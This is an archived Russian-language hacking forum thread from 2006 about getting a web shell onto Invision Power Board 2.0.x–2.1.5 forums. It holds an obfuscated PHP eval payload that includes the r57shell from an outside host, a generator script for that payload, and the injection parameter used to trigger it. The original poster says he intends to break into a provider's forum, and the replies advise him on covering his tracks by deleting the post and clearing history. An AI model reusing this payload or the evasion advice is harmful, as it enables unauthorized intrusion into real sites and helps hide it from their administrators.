ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопросик по шеллу
  #1  
Старый 08.07.2006, 14:49
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию Вопросик по шеллу

Вот шелл для ипб 2.0.х - 2.1.5.

Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Значиццо выглядит это так :

Код:
<?php  $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */  echo "eval( ";  for($i=0;$i<strlen($str);$i++)  {  	echo "chr(".ord($str[$i])."). ";  }  echo "chr(".ord(" ").") ); //";  ?>
Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла :

Код:
&lastdate=z|eval.*?%20//)%23e%00
Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум.
 
Ответить с цитированием

  #2  
Старый 08.07.2006, 14:55
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sulf aka Joker  
то шелл не будет присутствовать не серве, тем самым следы можно замести?
Следы можно замести только почистив хистори...
 
Ответить с цитированием

  #3  
Старый 08.07.2006, 14:57
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Мля ну ты дал. Include есть Include.
Конечно
Цитата:
... не подгружает его в сам форум.
 
Ответить с цитированием

  #4  
Старый 08.07.2006, 14:57
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

Я имею ввиду - то что в админке будет виден заход другого админа это да, но например администрация серва - она как догадается что форум открыли именно через этот шелл?
 
Ответить с цитированием

  #5  
Старый 08.07.2006, 15:00
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Цитата:
форум открыли
Это как?-)))
 
Ответить с цитированием

  #6  
Старый 08.07.2006, 15:02
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

Всмысле проникли в админку ну и так далее - по выбору. Будет видно что новый админ появился, и всё, верно? То что именно р57 шелл юзали, не будет видно?
 
Ответить с цитированием

  #7  
Старый 08.07.2006, 15:02
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Ну да, находится на rst, а выполняется на жертве.
Просто залей через него локальный шелл и потри сообщение.
__________________
Full DNS report
 
Ответить с цитированием

  #8  
Старый 08.07.2006, 15:05
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

Я просто хочу на одном форуме провайдера, вытереить один раздел форум и забанить 1 юзера, ну не хочу чтоб меня запалили под этим делом. Под прокси всё буду делать, потом тему с кодом шелла вытру полностью. Так не запалят?
 
Ответить с цитированием

  #9  
Старый 08.07.2006, 15:06
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

И хистори сотри....
 
Ответить с цитированием

  #10  
Старый 08.07.2006, 15:07
Sulf aka Joker
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848

Репутация: 27
По умолчанию

А хистори - в админке типо?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ОТВЕТЬТЕ please! НА ВОПРОСИК... Болталка 13 15.08.2009 15:09
Вопросик ! z0liCh Болталка 9 07.11.2005 15:59
Небольшой вопросик... Ipb -SX- Форумы 6 17.10.2005 13:15
Вопросик!!! Xalegi Чаты 1 12.12.2004 15:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ